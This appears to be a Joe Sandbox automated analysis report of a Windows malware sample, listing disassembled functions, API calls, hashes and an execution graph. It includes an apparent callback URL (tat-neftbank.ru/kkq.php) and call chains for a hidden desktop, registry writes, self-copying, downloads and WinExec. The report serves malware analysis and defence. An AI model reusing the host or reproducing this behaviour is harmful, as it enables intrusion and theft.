                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction ID: 691f158720e2b36127ee9bd81ba90e70b5a5535aabeb9bf87ba7554e5ddc9d88
                            • Opcode Fuzzy Hash: 357a631b938b58c4fbb87905ba1aa3de6a3adf1b78dd9d8722630d207e2470c7
                            • Instruction Fuzzy Hash: 9801F271B1410ABACF109E25CC02BEEBFA99F94390F140472BE04F61E1D374EE11A3A9
                            Function 00403743 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403769
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403780
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080,00000000), ref: 00403798
                            • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000002,?,C0000000,00000000,00000000,?,00000080), ref: 0040379E
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandlePointerWrite
                            • String ID:
                            • API String ID: 3604237281-0
                            • Opcode ID: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction ID: cf1cf3c615f6ac6775c7614bbea78a1f327309af87cada33f382846b8ae172d8
                            • Opcode Fuzzy Hash: dac2396c127bae0588a020e64ec8d65c8c20fafefb6c849fc3be04b1fb147846
                            • Instruction Fuzzy Hash: 1BF0E972B442143AE62029758C03FDE355D8B41B78F144131FB10FB1D1D5B8BA0142AD
                            Function 0040185F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 152COMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • _sleep.CRTDLL(00000000), ref: 00401985
                            Strings
                            • Microsoft Internet Explorer, xrefs: 004018E9
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: TextWindow_sleep
                            • String ID: Microsoft Internet Explorer
                            • API String ID: 2600969163-3125735337
                            • Opcode ID: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction ID: b939d44f97a8665b9279395720dceab0b5e56fea97a4cdd5017e5321b1dcff8d
                            • Opcode Fuzzy Hash: 2f2919c86dfda4ef7c58b175597176eedc8b81590a8529b1749621bc65d83200
                            • Instruction Fuzzy Hash: 0B511D71A00215EFDB20CFA8D884BAAB7F4BB18315F5041B6E904E72A0D7749995CF59
                            Function 0040682B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00406753: CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                              • Part of subcall function 00406753: GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                              • Part of subcall function 00406753: CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                            • _sleep.CRTDLL(000927C0,00418E30,http://tat-neftbank.ru/kkq.php,ofs_kk), ref: 00406854
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.1986161692.0000000000401000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.1986082402.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986218308.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986278378.000000000042E000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986361643.000000000042F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986441132.0000000000436000.00000020.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 00000008.00000002.1986499402.0000000000438000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_Onkcje32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize_sleep
                            • String ID: http://tat-neftbank.ru/kkq.php$ofs_kk
                            • API String ID: 4235044784-1201080362
                            • Opcode ID: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction ID: fffe33e14b07b0123592d698d33e8a34a507cc30d1f0c5c96ad3af2b43ec03e4
                            • Opcode Fuzzy Hash: 616e9dee88e1a58cfa8eb2cd68ddd21616f6de5f00dd5623ea3079b7e2cd762d
                            • Instruction Fuzzy Hash: ADD05E72B453043B9200757E9D07929F5CE4AA0AA83B9446BBA01F73F1E8F89E1151AB

                            Execution Graph

                            Execution Coverage:5.4%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:542
                            Total number of Limit Nodes:2
                            execution_graph 2707 403840 printf 2708 403880 2707->2708 2709 403884 printf 2708->2709 2710 40386d printf 2708->2710 2710->2708 2716 4052e0 2717 4052ec strcat strcat 2716->2717 2733 40431f 2717->2733 2720 405360 2721 40537c CreateProcessA 2720->2721 2722 4053ac CloseHandle sprintf 2721->2722 2732 405469 2721->2732 2724 405413 2722->2724 2723 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 2725 4054d0 2723->2725 2726 4053e5 FindWindowA 2724->2726 2727 40541d 2724->2727 2726->2727 2728 405402 Sleep 2726->2728 2729 405421 Sleep 2727->2729 2727->2732 2728->2724 2730 405434 Sleep 2729->2730 2731 40543e GetWindowTextA 2729->2731 2730->2731 2731->2732 2732->2723 2734 404341 GetCurrentThreadId GetThreadDesktop 2733->2734 2735 404364 CreateDesktopA 2733->2735 2736 40438e SetThreadDesktop 2734->2736 2737 40435f memset 2734->2737 2735->2736 2735->2737 2736->2737 2737->2720 2737->2721 2840 401581 2841 4015c8 2840->2841 2842 4015a2 rand 2841->2842 2843 4015cc 2841->2843 2842->2841 2738 403562 GetModuleFileNameA 2739 403588 2738->2739 3000 402ba3 3002 402a89 3000->3002 3001 402cd2 3002->3001 3003 402cad GetCurrentProcessId 3002->3003 3004 402b2a GetModuleHandleA GetProcAddress 3002->3004 3003->3002 3004->3002 2740 4077e4 2741 407808 2740->2741 2748 40789e 2740->2748 2742 407820 SetFocus 2741->2742 2743 40782b 2741->2743 2741->2748 2742->2743 2744 407833 SetFocus 2743->2744 2745 40783e 2743->2745 2744->2745 2746 407857 2745->2746 2747 40784c SetFocus 2745->2747 2749 40786a 2746->2749 2750 40785f SetFocus 2746->2750 2747->2746 2753 4078fe CallWindowProcA 2748->2753 2755 407910 2748->2755 2751 407872 SetFocus 2749->2751 2752 40787d 2749->2752 2750->2749 2751->2752 2752->2748 2754 407885 SetFocus 2752->2754 2753->2755 2754->2748 2844 405c09 lstrlenA GetTickCount srand 2877 40509b 2844->2877 2849 405f54 2850 405caf ExpandEnvironmentStringsA 2891 40570c 2850->2891 2853 405ceb strcat strcat 2854 40431f 4 API calls 2853->2854 2855 405d14 memset 2854->2855 2856 405d72 CreateProcessA 2855->2856 2857 405d56 2855->2857 2858 405da2 CloseHandle sprintf 2856->2858 2859 405f24 DeleteFileA TerminateProcess CloseHandle 2856->2859 2857->2856 2860 405e09 2858->2860 2859->2849 2861 405e13 2860->2861 2862 405ddb FindWindowA 2860->2862 2861->2859 2863 405e1b Sleep GetWindowTextA 2861->2863 2862->2861 2864 405df8 Sleep 2862->2864 2865 405e50 2863->2865 2864->2860 2865->2859 2930 405613 2865->2930 2867 405e6b 2867->2859 2868 405e76 CopyFileA 2867->2868 2869 403619 5 API calls 2868->2869 2870 405e9c DeleteFileA lstrlenA strncmp 2869->2870 2871 405ec6 lstrlenA 2870->2871 2872 405eef 2870->2872 2938 403743 CreateFileA 2871->2938 2874 403743 4 API calls 2872->2874 2875 405eea LocalFree 2874->2875 2875->2859 2878 4050ea 2877->2878 2879 4050b6 sprintf 2878->2879 2880 4050f8 2878->2880 2941 4041f4 2879->2941 2882 4041f4 4 API calls 2880->2882 2883 40510e 2882->2883 2944 4041c3 lstrlenA 2883->2944 2886 40429c RegOpenKeyExA 2887 4042e0 RegQueryValueExA 2886->2887 2890 4042dc 2886->2890 2888 404304 RegCloseKey 2887->2888 2889 4042f8 RegCloseKey 2887->2889 2888->2890 2889->2890 2890->2849 2890->2850 2892 4079e4 2891->2892 2893 405719 GetTempPathA 2892->2893 2894 405746 2893->2894 2952 4015ea 2894->2952 2897 405798 strcat 2898 4057ac rand 2897->2898 2899 4057e7 rand 2898->2899 2900 4057be rand sprintf 2898->2900 2901 4057f9 strcat 2899->2901 2902 40580d strcat rand 2899->2902 2900->2899 2901->2902 2903 405839 strcat 2902->2903 2904 40584d rand 2902->2904 2903->2904 2905 405888 sprintf rand 2904->2905 2906 40585f rand sprintf 2904->2906 2907 4058c3 strcat 2905->2907 2908 4058d7 strcat rand 2905->2908 2906->2905 2907->2908 2909 405911 strcat rand 2908->2909 2910 4058fd strcat 2908->2910 2911 405966 strcat rand 2909->2911 2912 40593d rand sprintf 2909->2912 2910->2909 2913 4059a0 strcat rand 2911->2913 2914 40598c strcat 2911->2914 2912->2911 2915 4059d2 strcat 2913->2915 2916 4059e6 strcat rand 2913->2916 2914->2913 2915->2916 2917 405a20 sprintf rand 2916->2917 2918 405a0c strcat 2916->2918 2919 405a70 strcat rand 2917->2919 2920 405a5c strcat 2917->2920 2918->2917 2921 405ab0 rand sprintf rand 2919->2921 2922 405a9c strcat 2919->2922 2920->2919 2923 405af3 strcat 2921->2923 2924 405b07 strcat rand 2921->2924 2922->2921 2923->2924 2925 405b39 strcat 2924->2925 2926 405b4d rand 2924->2926 2925->2926 2927 405b88 strcat CreateFileA lstrlenA WriteFile CloseHandle 2926->2927 2928 405b5f rand sprintf 2926->2928 2929 405c04 2927->2929 2928->2927 2929->2849 2929->2853 2931 4079e4 2930->2931 2932 405620 FindFirstUrlCacheEntryA 2931->2932 2933 405663 _stricmp 2932->2933 2936 405685 2932->2936 2934 4056a7 FindNextUrlCacheEntryA 2933->2934 2933->2936 2935 4056c9 _stricmp 2934->2935 2934->2936 2935->2936 2937 4056fb 2935->2937 2936->2867 2937->2934 2939 403775 2938->2939 2940 403779 SetFilePointer WriteFile CloseHandle 2938->2940 2939->2875 2940->2939 2947 40421f RegCreateKeyExA 2941->2947 2945 40421f 4 API calls 2944->2945 2946 4041ee InterlockedIncrement memset 2945->2946 2946->2886 2948 404262 RegSetValueExA 2947->2948 2949 404219 2947->2949 2950 404288 RegCloseKey 2948->2950 2951 40427c RegCloseKey 2948->2951 2949->2878 2950->2949 2951->2949 2953 401634 2952->2953 2954 401638 strcat sprintf rand 2953->2954 2955 40160e rand 2953->2955 2954->2897 2954->2898 2955->2953 3005 4037aa 3007 4037c8 printf printf 3005->3007 3008 40380d 3007->3008 3009 4037fa printf 3008->3009 3011 403812 printf 3008->3011 3009->3008 3012 4035ab 3013 4079e4 3012->3013 3014 4035b8 vsprintf 3013->3014 3017 4035f9 MessageBoxA 3014->3017 3016 4035ea 3017->3016 2756 40686c lstrlenA 2757 405f5b 9 API calls 2756->2757 2758 40689a 2757->2758 2759 4068a1 WinExec 2758->2759 2760 4068a9 2758->2760 2759->2760 2956 40328f 2957 402efd 2956->2957 2958 402cd7 3 API calls 2957->2958 2959 4033ce 2957->2959 2960 4030e5 GetModuleHandleA 2957->2960 2961 40289a 4 API calls 2957->2961 2962 40314c VirtualQuery 2957->2962 2964 402f98 GlobalMemoryStatus 2957->2964 2965 402f6f IsBadReadPtr 2957->2965 2966 403059 CloseHandle 2957->2966 2958->2957 2960->2957 2961->2957 2962->2957 2963 4031b1 IsBadWritePtr 2962->2963 2963->2957 2964->2957 2965->2957 2966->2957 2967 407892 2968 40789e 2967->2968 2969 407910 2968->2969 2970 4078fe CallWindowProcA 2968->2970 2970->2969 3018 405133 10 API calls 3019 40429c 4 API calls 3018->3019 3020 405264 3019->3020 3021 405278 3020->3021 3022 40526b LocalFree 3020->3022 3024 40509b 6 API calls 3021->3024 3023 4054d0 3022->3023 3025 40527d ExpandEnvironmentStringsA 3024->3025 3044 404532 3025->3044 3028 4052d3 LocalFree 3028->3023 3029 4052ec strcat strcat 3030 40431f 4 API calls 3029->3030 3031 405315 memset 3030->3031 3032 405360 3031->3032 3033 40537c CreateProcessA 3031->3033 3032->3033 3034 4053ac CloseHandle sprintf 3033->3034 3043 405469 3033->3043 3036 405413 3034->3036 3035 405492 DeleteFileA LocalFree TerminateProcess CloseHandle 3035->3023 3037 4053e5 FindWindowA 3036->3037 3038 40541d 3036->3038 3037->3038 3039 405402 Sleep 3037->3039 3040 405421 Sleep 3038->3040 3038->3043 3039->3036 3041 405434 Sleep 3040->3041 3042 40543e GetWindowTextA 3040->3042 3041->3042 3042->3043 3043->3035 3045 40453f 3044->3045 3046 403619 5 API calls 3045->3046 3047 404570 3046->3047 3048 404579 3047->3048 3049 404596 lstrlenA LocalAlloc GetTempPathA 3047->3049 3050 404589 LocalFree 3047->3050 3048->3028 3048->3029 3051 404604 3049->3051 3050->3048 3051->3051 3052 4015ea rand 3051->3052 3053 40461d strcat sprintf rand 3052->3053 3054 404655 strcat 3053->3054 3055 404668 rand 3053->3055 3054->3055 3056 40467a rand sprintf 3055->3056 3057 40469d rand 3055->3057 3056->3057 3058 4046bb strcat 3057->3058 3059 4046ce strcat rand 3057->3059 3058->3059 3060 4046f3 strcat 3059->3060 3061 404706 rand 3059->3061 3060->3061 3062 404741 sprintf rand 3061->3062 3063 40471e rand sprintf 3061->3063 3064 404770 strcat 3062->3064 3065 404783 strcat rand 3062->3065 3063->3062 3064->3065 3066 4047a8 strcat 3065->3066 3067 4047bb strcat rand 3065->3067 3066->3067 3068 4047e6 rand sprintf 3067->3068 3069 404809 rand sprintf sprintf rand 3067->3069 3068->3069 3070 404859 rand sprintf 3069->3070 3071 40487c rand 3069->3071 3070->3071 3072 404894 strcat 3071->3072 3073 4048a7 rand 3071->3073 3072->3073 3074 4048b9 strcat 3073->3074 3075 4048cc rand 3073->3075 3074->3075 3076 4048f1 sprintf rand 3075->3076 3077 4048de strcat 3075->3077 3078 404926 strcat 3076->3078 3079 404939 rand 3076->3079 3077->3076 3078->3079 3080 40494b strcat 3079->3080 3081 40495e rand 3079->3081 3080->3081 3082 404976 rand sprintf 3081->3082 3083 404999 3081->3083 3082->3083 3087 4049a3 3083->3087 3110 404b12 3083->3110 3084 404b07 3086 404c87 strcat rand 3084->3086 3085 4043bf 2 API calls 3085->3110 3088 404cac strcat 3086->3088 3089 404cbf rand 3086->3089 3087->3084 3090 404a4b sprintf rand 3087->3090 3091 4049d9 sprintf 3087->3091 3088->3089 3092 404cd1 strcat 3089->3092 3093 404ce4 rand 3089->3093 3094 404a82 strcat 3090->3094 3095 404a95 rand 3090->3095 3091->3087 3092->3093 3097 404cf6 strcat 3093->3097 3098 404d09 strcat rand 3093->3098 3094->3095 3099 404aa7 strcat 3095->3099 3100 404aba rand 3095->3100 3096 404b47 sprintf 3096->3110 3097->3098 3101 404d34 rand sprintf 3098->3101 3102 404d57 rand 3098->3102 3099->3100 3100->3087 3103 404acc strcat 3100->3103 3101->3102 3104 404d69 strcat 3102->3104 3105 404d7c rand 3102->3105 3103->3087 3104->3105 3106 404da1 rand 3105->3106 3107 404d8e strcat 3105->3107 3108 404db9 strcat 3106->3108 3109 404dcc rand 3106->3109 3107->3106 3108->3109 3111 404e01 strcat rand 3109->3111 3112 404dde rand sprintf 3109->3112 3110->3085 3110->3086 3110->3096 3137 40447a lstrlenA LocalAlloc 3110->3137 3114 404e2c strcat 3111->3114 3115 404e3f strcat rand 3111->3115 3112->3111 3114->3115 3117 404e64 strcat 3115->3117 3118 404e77 strcat rand 3115->3118 3117->3118 3121 404ea2 strcat 3118->3121 3122 404eb5 sprintf rand 3118->3122 3119 404c02 rand 3123 404c14 strcat 3119->3123 3124 404c27 rand 3119->3124 3120 404bef strcat 3120->3119 3121->3122 3127 404ee3 strcat 3122->3127 3128 404ef6 strcat rand 3122->3128 3123->3124 3125 404c39 strcat 3124->3125 3126 404c4c LocalFree 3124->3126 3125->3126 3126->3110 3127->3128 3129 404f27 strcat 3128->3129 3130 404f3a rand sprintf rand 3128->3130 3129->3130 3131 404f77 strcat 3130->3131 3132 404f8a strcat rand 3130->3132 3131->3132 3133 404fb5 strcat 3132->3133 3134 404fc8 rand 3132->3134 3133->3134 3135 404fda rand sprintf 3134->3135 3136 404ffd 7 API calls 3134->3136 3135->3136 3136->3048 3138 4044b6 3137->3138 3139 4044d9 sprintf 3138->3139 3140 40452a sprintf rand 3138->3140 3139->3138 3140->3119 3140->3120 3141 401b33 3144 401aa4 3141->3144 3142 401b13 3143 401ae6 sprintf 3146 40129c 3143->3146 3144->3142 3144->3143 3147 4012a9 CreateFileA 3146->3147 3148 4079e4 3146->3148 3149 4012db ReadFile CloseHandle 3147->3149 3150 4012d7 3147->3150 3148->3147 3149->3150 3150->3142 3151 4036b3 CreateFileA 3152 4036e3 3151->3152 3153 4036e7 SetFilePointer 3151->3153 3154 403701 3153->3154 3154->3154 3155 403708 WriteFile WriteFile CloseHandle 3154->3155 3155->3152 2761 406ff6 2762 4071a4 2761->2762 2763 40701f 2761->2763 2764 40717e 2762->2764 2765 4071be DestroyWindow 2762->2765 2766 407021 2763->2766 2767 40702f 2763->2767 2765->2764 2768 407184 2766->2768 2769 40702a 2766->2769 2770 407289 GetWindowTextA 2767->2770 2771 40703a 2767->2771 2768->2764 2774 407198 PostQuitMessage 2768->2774 2775 4077cc DefWindowProcA 2769->2775 2772 4072c9 GetWindowTextA 2770->2772 2773 4072a9 MessageBoxA SetFocus 2770->2773 2776 407041 2771->2776 2777 40705c 2771->2777 2778 407322 2772->2778 2779 407302 MessageBoxA SetFocus 2772->2779 2773->2764 2774->2764 2775->2764 2776->2769 2776->2775 2781 4071cb 2776->2781 2780 407149 2777->2780 2817 405ffa 2777->2817 2785 407337 MessageBoxA SetFocus 2778->2785 2794 407357 2778->2794 2779->2764 2780->2764 2824 406075 2780->2824 2781->2764 2787 407224 SetTextColor 2781->2787 2789 407233 SetTextColor 2781->2789 2785->2764 2786 405ffa 3 API calls 2788 40709b GetWindowRect 2786->2788 2790 40723d SetBkColor CreateBrushIndirect 2787->2790 2788->2780 2791 4070be GetWindowRect 2788->2791 2789->2790 2790->2764 2791->2780 2793 4070d4 2791->2793 2792 4073a7 sprintf GetWindowTextA 2796 40740f sprintf GetWindowTextA 2792->2796 2797 4073ef MessageBoxA SetFocus 2792->2797 2793->2780 2800 407112 MoveWindow 2793->2800 2794->2792 2795 407376 MessageBoxA SetFocus 2794->2795 2795->2764 2798 407477 sprintf GetWindowTextA 2796->2798 2799 407457 MessageBoxA SetFocus 2796->2799 2797->2764 2801 4074d9 2798->2801 2802 4074b9 MessageBoxA SetFocus 2798->2802 2799->2764 2800->2780 2803 4074ee MessageBoxA SetFocus 2801->2803 2805 40750e 2801->2805 2802->2764 2803->2764 2804 40755e sprintf GetWindowTextA 2807 4075c6 2804->2807 2808 4075a6 MessageBoxA SetFocus 2804->2808 2805->2804 2806 40752d MessageBoxA SetFocus 2805->2806 2806->2764 2809 407627 sprintf CreateFileA SetFilePointer 2807->2809 2810 4075e5 MessageBoxA SetFocus 2807->2810 2808->2764 2811 40768e 2809->2811 2810->2764 2811->2811 2812 407695 WriteFile WriteFile 2811->2812 2813 4076db 2812->2813 2813->2813 2814 4076e2 6 API calls 2813->2814 2815 40776e 2814->2815 2815->2815 2816 407775 WriteFile WriteFile CloseHandle ShowWindow 2815->2816 2816->2764 2818 4079e4 2817->2818 2819 406007 GetWindow 2818->2819 2822 406020 2819->2822 2820 406028 GetClassNameA 2820->2822 2821 406024 2821->2786 2822->2820 2822->2821 2823 40605f GetWindow 2822->2823 2823->2822 2825 405ffa 3 API calls 2824->2825 2826 406096 2825->2826 2827 405ffa 3 API calls 2826->2827 2828 4060a3 10 API calls 2827->2828 2829 406224 SendMessageA 2828->2829 2830 40623a SendMessageA 2828->2830 2831 40624e CreateWindowExA CreateWindowExA 2829->2831 2830->2831 2832 406333 2831->2832 2833 4062cb sprintf SendMessageA sprintf SendMessageA 2832->2833 2834 40633c 34 API calls 2832->2834 2833->2832 2834->2764 2971 401219 2972 40121f __GetMainArgs 2971->2972 2973 407980 173 API calls 2972->2973 2974 401284 exit 2973->2974 2975 40109a 2983 40109b 2975->2983 2976 40117f 2977 40118e signal 2976->2977 2978 4011a8 signal 2977->2978 2979 4011c9 2977->2979 2978->2979 2980 40117b 2978->2980 2979->2980 2981 4011ce signal raise 2979->2981 2981->2980 2983->2976 2983->2977 2983->2980 2984 40107a RtlUnwind 2983->2984 2984->2983 2835 40237b 2836 402333 _sleep 2835->2836 2837 402355 2835->2837 2838 401b9f 23 API calls 2836->2838 2839 40234c 2838->2839 2839->2836 2839->2837 2985 40109b 2986 40117f 2985->2986 2993 4010c3 2985->2993 2987 40118e signal 2986->2987 2988 4011a8 signal 2987->2988 2989 4011c9 2987->2989 2988->2989 2990 40117b 2988->2990 2989->2990 2991 4011ce signal raise 2989->2991 2991->2990 2993->2987 2993->2990 2994 40107a RtlUnwind 2993->2994 2994->2993 2995 40129b 2996 4079e4 2995->2996 2997 4012a9 CreateFileA 2996->2997 2998 4012db ReadFile CloseHandle 2997->2998 2999 4012d7 2997->2999 2998->2999 2711 40365e 2712 403664 GetFileSize LocalAlloc 2711->2712 2713 403684 ReadFile CloseHandle 2712->2713 2715 4036ae 2713->2715 2530 40121f __GetMainArgs 2533 407980 GetCommandLineA 2530->2533 2534 407991 strchr 2533->2534 2538 4079a6 2533->2538 2535 4079cf GetModuleHandleA 2534->2535 2534->2538 2539 406c29 OpenMutexA 2535->2539 2538->2535 2540 406c6d GetVersionExA GetSystemDirectoryA GetTickCount srand GetModuleFileNameA 2539->2540 2541 406c5f CloseHandle exit 2539->2541 2542 406cd6 2540->2542 2541->2540 2543 406ce4 rand 2542->2543 2544 406e07 9 API calls 2542->2544 2546 406d5f 2543->2546 2586 402e06 2544->2586 2548 406d69 rand 2546->2548 2549 406d2f rand 2546->2549 2550 406d8a sprintf CopyFileA 2548->2550 2551 406d7c 2548->2551 2549->2546 2563 403ce9 rand 2550->2563 2551->2550 2552 406f65 2602 4023a7 CreateThread CloseHandle 2552->2602 2553 406f2d GetModuleHandleA GetProcAddress GetCurrentProcessId 2553->2552 2557 406f6a CreateThread CloseHandle CreateThread CloseHandle SetTimer 2559 406fdc GetMessageA 2557->2559 2654 4068b0 2557->2654 2672 40682b 2557->2672 2560 406fc4 TranslateMessage DispatchMessageA 2559->2560 2561 401284 exit 2559->2561 2560->2559 2564 403d27 2563->2564 2565 403d2e 2563->2565 2574 403f68 rand 2564->2574 2603 403619 CreateFileA 2565->2603 2568 403d47 memcpy memset 2570 403da1 rand rand rand rand memcpy 2568->2570 2571 403e64 2570->2571 2609 403bbe 2571->2609 2575 404002 2574->2575 2576 403fd4 rand 2575->2576 2577 404009 rand 2575->2577 2576->2575 2578 40402a 6 API calls 2577->2578 2579 40401c 2577->2579 2614 404148 RegCreateKeyExA 2578->2614 2579->2578 2581 4040f5 2582 404148 3 API calls 2581->2582 2583 404125 2582->2583 2584 404148 3 API calls 2583->2584 2585 40413a WinExec ExitProcess 2584->2585 2587 402e13 2586->2587 2617 402822 6 API calls 2587->2617 2589 402e1b GetVersion 2590 402e2e 2589->2590 2591 402e79 LoadLibraryA GetProcAddress 2590->2591 2601 402ef6 2590->2601 2591->2590 2592 4033ce GetVersion 2592->2552 2592->2553 2593 4030e5 GetModuleHandleA 2593->2601 2595 40314c VirtualQuery 2596 4031b1 IsBadWritePtr 2595->2596 2595->2601 2596->2601 2597 402f98 GlobalMemoryStatus 2597->2601 2598 402f6f IsBadReadPtr 2598->2601 2600 403059 CloseHandle 2600->2601 2601->2592 2601->2593 2601->2595 2601->2597 2601->2598 2601->2600 2618 40289a 2601->2618 2622 402cd7 2601->2622 2602->2557 2631 4022ee 2602->2631 2604 403664 GetFileSize LocalAlloc 2603->2604 2605 40364e 2603->2605 2606 403684 ReadFile CloseHandle 2604->2606 2605->2604 2608 4036ae 2605->2608 2606->2608 2608->2564 2608->2568 2611 403bfd 2609->2611 2610 403ce4 CreateFileA WriteFile CloseHandle LocalFree 2610->2564 2611->2610 2612 403c20 rand 2611->2612 2613 403c80 memset memcpy memcpy 2611->2613 2612->2611 2613->2611 2615 404193 2614->2615 2615->2615 2616 40419a RegSetValueExA RegCloseKey 2615->2616 2616->2581 2617->2589 2619 4028c6 GetSecurityInfo SetEntriesInAclA SetSecurityInfo CloseHandle 2618->2619 2621 4029cd 2619->2621 2621->2601 2623 402ceb 2622->2623 2625 402d13 2623->2625 2626 402a72 2623->2626 2625->2601 2629 402a89 2626->2629 2627 402cd2 2627->2625 2628 402b2a GetModuleHandleA GetProcAddress 2628->2629 2629->2627 2629->2628 2630 402cad GetCurrentProcessId 2629->2630 2630->2629 2632 402333 _sleep 2631->2632 2636 401b9f 2632->2636 2652 4079e4 2636->2652 2653 4079e5 2652->2653 2653->2653 2669 4068c7 2654->2669 2656 406c0c _sleep 2656->2669 2657 403619 5 API calls 2657->2669 2659 406c01 LocalFree 2659->2656 2660 406941 sscanf 2661 406972 rand 2660->2661 2660->2669 2661->2669 2662 406a84 atoi 2665 406aad sprintf 2662->2665 2662->2669 2663 4069a4 sprintf sprintf 2666 406a27 DeleteFileA sprintf WinExec 2663->2666 2664 4069db GetWindowsDirectoryA sprintf strcat 2664->2666 2665->2669 2666->2669 2667 406add lstrlenA 2667->2669 2668 406b20 sprintf lstrlenA lstrlenA LocalAlloc 2668->2669 2669->2656 2669->2657 2669->2659 2669->2660 2669->2662 2669->2663 2669->2664 2669->2667 2669->2668 2670 406b9b lstrlenA 2669->2670 2671 406bbe CreateThread CloseHandle 2669->2671 2676 405f5b lstrlenA lstrlenA LocalAlloc 2669->2676 2681 4043bf 2669->2681 2670->2669 2671->2669 2673 40683b 2672->2673 2689 406753 CreateFileA 2673->2689 2687 407a04 2676->2687 2678 405f9b lstrlenA 2688 407a04 2678->2688 2680 405fb4 DeleteUrlCacheEntry CreateThread WaitForSingleObject GetExitCodeThread CloseHandle 2680->2669 2682 4043dc 2681->2682 2683 40441a 2682->2683 2685 4043e2 memcpy 2682->2685 2684 404441 lstrlenA 2683->2684 2686 40442f 2683->2686 2684->2686 2685->2686 2686->2669 2687->2678 2688->2680 2690 40678f GetFileSize CloseHandle 2689->2690 2696 40681a _sleep 2689->2696 2697 4013cc RegOpenKeyExA 2690->2697 2696->2673 2698 4013fa 2697->2698 2699 4013fe RegQueryValueExA RegCloseKey 2697->2699 2698->2696 2700 4054d7 6 API calls 2698->2700 2699->2698 2701 405586 2700->2701 2702 4055ce CreateThread WaitForSingleObject 